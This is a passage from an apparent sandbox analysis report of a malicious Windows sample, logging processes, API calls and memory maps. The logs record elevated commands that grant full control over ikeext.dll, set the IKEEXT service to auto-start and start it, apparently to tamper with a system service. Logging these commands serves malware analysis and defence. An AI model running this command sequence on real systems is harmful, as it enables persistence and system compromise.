Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\icacls.exe, os_pid = 0xbd4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #14: cmd.exe

(Host: 58, Network: 0)

Information	Value
ID	#14
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:27

OS Process Information

Information	Value
PID	0xbe0
Parent PID	0xb74 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x BE4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x004fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000500000	0x00500000	0x00600fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000670000	0x00670000	0x0067ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000680000	0x00680000	0x0127ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001280000	0x01280000	0x013e2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x013f0000	0x016befff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xbe4

(Host: 53, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:35 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 81401	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\icacls.exe, os_pid = 0xbf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #16: cmd.exe

(Host: 59, Network: 0)

Information	Value
ID	#16
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:27

OS Process Information

Information	Value
PID	0xc00
Parent PID	0xb74 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C04

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x002affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002b0000	0x002b0000	0x002b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002c0000	0x002c0000	0x002c0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003b0000	0x003b0000	0x004affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000004b0000	0x004b0000	0x005b0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000690000	0x00690000	0x0069ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000006a0000	0x006a0000	0x0129ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000012a0000	0x012a0000	0x01402fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01410000	0x016defff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xc04

(Host: 54, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:35 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 81557	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 232, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0xc14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #17: sc.exe

(Host: 10, Network: 0)

Information	Value
ID	#17
File Name	c:\windows\system32\sc.exe
Command Line	sc config ikeext start= auto
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:27

OS Process Information

Information	Value
PID	0xc14
Parent PID	0xc00 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C18 0x C1C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000effff	Private Memory	Readable, Writable	Region Actions Download Dump
sc.exe.mui	0x000f0000	0x000fffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions Download Dump
sc.exe	0x00300000	0x0030bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000004d0000	0x004d0000	0x005cffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xc18

(Host: 10, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:35 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 81619	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0x300000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Info	service_name = ikeext	1	Fn
Service	Set Config	service_name = ikeext	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 34	1	Fn Data

Process #18: cmd.exe

(Host: 59, Network: 0)

Information	Value
ID	#18
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c "net start ikeext"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:27

OS Process Information

Information	Value
PID	0xc20
Parent PID	0xb74 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
